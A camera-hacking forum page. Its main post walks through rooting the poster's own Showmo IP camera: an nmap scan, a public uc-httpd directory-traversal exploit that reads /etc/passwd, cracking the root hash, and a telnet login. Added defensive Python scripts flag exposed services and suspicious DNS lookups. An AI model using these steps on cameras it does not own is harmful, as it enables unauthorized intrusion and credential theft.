Recent Posts

11
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China-based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code:
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code:
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0. Well, a bit of googling later I come to learn that this is an httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little Python program provided to attack my camera.

Code:
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into John the Ripper with GPU acceleration and I got my root password in a few minutes.

Code:
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this is a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to cross-compile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
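
Added example, not part of tanranger's post: an inventory check that parses `nmap -sV` normal output and flags the two exposures the post relied on, an open telnet service and the `uc-httpd 1.0.0` banner. The second host in the sample is constructed, and the function names are hypothetical.

```python
import re

# Constructed sample: the scan result quoted in the post plus one made-up host.
SAMPLE = """\
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Nmap scan report for 192.168.1.10
Host is up (0.01s latency).
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
23/tcp  closed telnet
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), [])
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current.append((int(m.group(1)), *m.groups()[1:]))
    return hosts

def findings(text):
    """Return sorted (host, port, reason) tuples for open services worth fixing."""
    out = []
    for host, ports in parse_nmap(text).items():
        for port, proto, state, service, version in ports:
            if state != "open":
                continue  # closed or filtered ports are not reachable services
            if service == "telnet":
                out.append((host, port, "telnet exposed (cleartext login)"))
            if version.startswith("uc-httpd 1.0.0"):
                out.append((host, port, "uc-httpd 1.0.0 (directory traversal, per the post)"))
    return sorted(out)
```

Run `findings()` over the saved output of a scan of your own camera VLAN; any hit is a device to firewall off or replace.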
12
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new to that module. I don't know how to do it. Can you help me if you know something?

Also I want to use this module for image processing. There is some OS on it. How can I change some files in it? I wanna do some image processing with it. I need to make modifications and add some code to the OS. Can I do that?
13
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by admin on June 24, 2017, 05:00:51 am »
Not an error,  you're in the bootloader - u-boot.
You need to boot past that into the OS.


14
Firmware / Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 19, 2017, 06:41:23 am »
Hi everyone,
I tried to access the Hi3516 in my camera module. I used a link to do this.
Link: https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
I wanna access root but got an error.


System startup


U-Boot 2010.06 (Jun 28 2016 - 09:04:41)

Check Flash Memory Controller v100 ... Found
SPI Nor(cs 0) ID: 0xc2 0x20 0x18
Block:64KB Chip:16MB Name:"MX25L128XX"
SPI Nor total size: 16MB
MMC:   
EMMC/MMC/SD controller initialization.
Card did not respond to voltage select!
No EMMC/MMC/SD device found !
In:    serial
Out:   serial
Err:   serial
Hit any key to stop autoboot:  1 ... 0
hisilicon #
hisilicon # root
Unknown command 'root' - try 'help'
hisilicon #
hisilicon #


Any ideas to solve this error? I apologize in advance for my English.
15
Help / Any instant on cameras?
« Last post by SlowBro on June 13, 2017, 03:49:47 pm »
Are there any cameras that come on very quickly, or which can be put in deep sleep mode to wake quickly?

I'd like to create a wire-free battery-powered motion sensing setup. The motion could be detected via IR sensor and a microcontroller could start up a camera. Images would be transmitted over Wi-Fi or cellular.

If the Foscam-style cams offer sleep mode that could work.
16
General Discussion / Sannce I21AG Locking down
« Last post by widemouth on June 11, 2017, 08:40:20 am »
Thought I would post my experience with this camera.

On bootup this camera attempts network connections to:

baidu.com
shifen.com
szxingweilai.cn
ec2-52-8-140-28.us-west-1.compute.amazonaws.com

And also directly attempts to connect to IP: 115.28.242.250

Horribly unsecure, so if you have the ability to block these on your router then I suggest you do.

Other than that, it appears to be a good and cheap 720p camera.
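
Added example, not part of widemouth's post: a check over a dnsmasq query log (its `log-queries` format) that reports when a given device looks up any of the domains listed above, matching subdomains but not look-alike names. The log lines and the camera address 192.168.1.50 are constructed. The hard-coded IP 115.28.242.250 never appears in DNS logs and needs a firewall rule or firewall log instead.

```python
import re

# Domains listed in the post above.
WATCHLIST = (
    "baidu.com",
    "shifen.com",
    "szxingweilai.cn",
    "ec2-52-8-140-28.us-west-1.compute.amazonaws.com",
)

# Constructed dnsmasq log lines; 192.168.1.50 is an assumed camera address.
SAMPLE_LOG = """\
Jun 11 08:40:01 dnsmasq[812]: query[A] www.baidu.com from 192.168.1.50
Jun 11 08:40:01 dnsmasq[812]: query[A] www.a.shifen.com from 192.168.1.50
Jun 11 08:40:02 dnsmasq[812]: query[A] notbaidu.com from 192.168.1.50
Jun 11 08:40:03 dnsmasq[812]: query[AAAA] szxingweilai.cn from 192.168.1.50
Jun 11 08:40:04 dnsmasq[812]: query[A] baidu.com from 192.168.1.20
Jun 11 08:40:05 dnsmasq[812]: reply www.baidu.com is 203.0.113.7
"""

QUERY_RE = re.compile(r"query\[(\w+)\] (\S+) from (\S+)$")

def on_watchlist(name, watchlist=WATCHLIST):
    """Return the watchlist domain that name equals or is a subdomain of, else None."""
    name = name.lower().rstrip(".")
    for domain in watchlist:
        if name == domain or name.endswith("." + domain):
            return domain
    return None

def camera_lookups(log_text, camera_ip):
    """Return (queried_name, matched_domain) pairs for queries sent by camera_ip."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m or m.group(3) != camera_ip:
            continue  # not a query line, or a different client
        domain = on_watchlist(m.group(2))
        if domain:
            hits.append((m.group(2), domain))
    return hits
```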


17
Hacking & Modding / Re: H3518 / UART TxRx
« Last post by admin on May 31, 2017, 01:04:49 am »
HI3518

Look at the data sheet, and see what the RX / TX pins are, then follow those around the board to see if they end up anywhere accessible.

T19 / T18 according to the data sheet
http://www.datasheetspdf.com/PDF/Hi3518/853432/64

Also look at this -

https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
18
Hacking & Modding / H3518 / UART TxRx
« Last post by maxxxxpower on May 23, 2017, 10:34:59 am »
Have a FW issue with my camera. Need to get back in to it via serial to restore the FW. I don't seem to be able to find the UART TxRx on this board though. Can anyone help?

19
Similar Hardware / Please i need help with my FOSCAM 9821
« Last post by dumaster on May 15, 2017, 01:08:57 pm »
Please, I need help with my FOSCAM 9821

My Foscam 9821 (plate FI9821A_MAIN_2V1 code) stopped working. As I am a technician in electronics and have some maintenance equipment, I decided to try to fix it. I made a serial connection to monitor the boot; to my surprise the initialization already hangs in u-boot and does not enable the option to enter upload mode. I believe that the data in the SPI flash memory is corrupted or it is damaged. I'm thinking of removing it from the board to do a re-programming and verification test, but I would need a complete ROM dump for this card model or similar, one that includes everything: kernel, root and also u-boot, so I can use my programmer to reprogram the SPI memory and bring my camera back to life. If someone could help me I would be very grateful.

Eduardo Lopes  :)
20
Hacking & Modding / Please i need help with my FOSCAM 9821
« Last post by dumaster on May 15, 2017, 01:08:17 pm »
Please, I need help with my FOSCAM 9821

My Foscam 9821 (plate FI9821A_MAIN_2V1 code) stopped working. As I am a technician in electronics and have some maintenance equipment, I decided to try to fix it. I made a serial connection to monitor the boot; to my surprise the initialization already hangs in u-boot and does not enable the option to enter upload mode. I believe that the data in the SPI flash memory is corrupted or it is damaged. I'm thinking of removing it from the board to do a re-programming and verification test, but I would need a complete ROM dump for this card model or similar, one that includes everything: kernel, root and also u-boot, so I can use my programmer to reprogram the SPI memory and bring my camera back to life. If someone could help me I would be very grateful.

Eduardo Lopes  :)